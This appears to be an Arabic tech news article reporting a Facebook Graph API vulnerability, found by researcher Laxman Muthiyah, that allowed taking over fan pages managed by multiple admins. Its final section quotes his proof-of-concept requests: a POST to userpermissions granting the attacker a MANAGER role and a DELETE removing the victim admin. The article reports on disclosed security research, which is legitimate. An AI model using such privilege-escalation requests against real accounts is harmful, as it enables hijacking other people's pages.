خطير ! بالفيديو ثغرة جديدة تمكن القراصنة من إختراق صفحات المعجبين في فيسبوك !

إستطاع شخص هندي اكتشاف ثغرة جديدة تتيح إختراق صفحات الفيسبوك، وهي ثالث ثغرة يقوم الهندي Laxman Muthiyah باكتشافها هذه السنة، بعد ان عثر في وقت سابق من هذا العام على ثغرة عبر Facebook graphs تتيح مشاهدة و حذف صور الألبومات على فيسبوك حتى لو كانت هذه الصور ذات الخصوصية الفردية.

و بعد مرور قرابة شهر من ذلك اكتشف "لاكسمان" ثغرة قريبة نوعا ما من الثغرة الأولى تتيح الوصول للصور الألبومات المحفوظة ذات الخصوصية على فيسبوك مع إمكانية حفظها على جهاز الهاكر.

اليوم استطاع "لاكسمان" العثور على ثغرة بالغة الخطورة تتيح إختراق صفحات المعجبين على فيسبوك التي يتم إدارتها من طرف عدة مستخدمين مثل صفحات المشاهير السياسيين أو الفنانين.

وتمكن الخبير الأمني من إيجاد تسلل للوحة إدارة التحكم في هذه الصفحات الموجودة بالآلاف على موقع التواصل الشهير "فيسبوك"، ويستطيع "لاكسمان" من خلال هذه الثغرة أن يحرم ملاك من إدارة صفحاتهم أو أن يسرق صفحتهم بالكامل.

و حسب "لاكسمان" فيمكن للهاكر استعمال سلسلة من الطلبات لمحالوة جعله مدير أو مشرف في صفحة معينة، ويمكن استعمال على سبيل المثال الطلب :

POST /PGID/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
role=MANAGER&user=user_id>&access_token=<application_access_token>

Response

true

Removing Victim

Request

Delete /<page_id>/userpermissions HTTP/1.1

Host : graph.facebook.com

Content-Length: 245

user=<target_user_id>&access_token=access_token>

Response

true

"Thats all! Target page is hacked!"